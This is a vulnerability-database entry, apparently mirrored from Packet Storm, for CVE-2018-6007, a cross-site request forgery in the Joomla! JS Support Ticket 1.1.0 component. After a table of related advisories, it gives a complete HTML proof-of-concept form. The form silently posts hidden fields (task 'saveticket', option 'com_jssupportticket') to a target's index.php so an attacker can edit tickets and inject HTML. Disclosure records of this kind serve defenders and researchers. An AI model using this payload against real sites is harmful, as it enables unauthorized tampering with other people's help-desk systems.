Joomla! JS Support Ticket 1.1.0 Cross Site Request Forgery

🗓️ 28 Jan 2018 00:00:00Reported by Ihsan SencanType

packetstorm🔗 packetstormsecurity.com👁 47 Views

Joomla! JS Support Ticket 1.1.0 Cross-Site Request Forger

Reporter	Title	Published	Views	Family All 11
0day.today	Joomla JS Support Ticket 1.1.0 Component - Cross-Site Request Forgery Vulnerability	28 Jan 201800:00	–	zdt
CNVD	Joomla! JS Support Ticket Cross-Site Request Forgery Vulnerability	2 Feb 201800:00	–	cnvd
Check Point Advisories	Joomla com_jssupportticket Component Cross-Site Scripting (CVE-2018-6007)	27 Feb 201800:00	–	checkpoint_advisories
CVE	CVE-2018-6007	29 Jan 201805:00	–	cve
Cvelist	CVE-2018-6007	29 Jan 201805:00	–	cvelist
Exploit DB	Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery	28 Jan 201800:00	–	exploitdb
EUVD	EUVD-2018-17772	7 Oct 202500:30	–	euvd
exploitpack	Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery	28 Jan 201800:00	–	exploitpack
NVD	CVE-2018-6007	29 Jan 201805:29	–	nvd
OSV	CVE-2018-6007	29 Jan 201805:29	–	osv

`<!--  
# # # # #  
# Exploit Title: Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery  
# Dork: N/A  
# Date: 27.01.2018  
# Vendor Homepage: http://www.joomsky.com/  
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/js-support-ticket/  
# Software Download: http://joomsky.com/46/download/1.html  
# Version: 1.1.0  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2018-6007  
# # # # #  
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Social: @ihsansencan  
# # # # #  
# Description:  
# The vulnerability implication allows an attacker to inject html code, edit ticket etc..  
#   
# Proof of Concept:   
-->  
  
<html>  
<body>  
  
<form action="http://localhost/[PATH]/index.php" method="POST" enctype="multipart/form-data" name="adminForm" id="adminForm">  
<textarea name="message" id="message" cols="60" rows="20" style="width: 550px; height: 300px;">  
<p>[CODE]</p>  
</textarea><br>  
<input type="submit" class="button" name="submit_app" id="submit_app_button" onclick="return validate_form(document.adminForm)" value="Ver Ayari">  
<input type="hidden" name="id" id="id" value="1" />  
<input type="hidden" name="isoverdue" id="isoverdue" value="0" />  
<input type="hidden" name="ticketid" id="ticketid" value="vCP4VTWrwzY" />  
<input type="hidden" name="c" id="c" value="ticket" />  
<input type="hidden" name="task" id="task" value="saveticket" />  
<input type="hidden" name="uid" id="uid" value="521" />  
<input type="hidden" name="view" id="view" value="ticket" />  
<input type="hidden" name="layout" id="layout" value="formticket" />  
<input type="hidden" name="check" id="check" value="" />  
<input type="hidden" name="option" id="option" value="com_jssupportticket" />  
<input type="hidden" name="created" id="created" value="2018-01-27 11:46:58"/>  
<input type="hidden" name="update" id="update" value=""/>  
</form>  
  
</body>  
</html>  
  
`

28 Jan 2018 00:00Current

8.7High risk

Vulners AI Score8.7

EPSS0.00306